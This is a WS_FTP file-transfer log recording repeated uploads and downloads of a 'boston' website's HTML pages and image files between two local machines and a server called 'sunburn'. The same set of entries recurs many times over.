10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
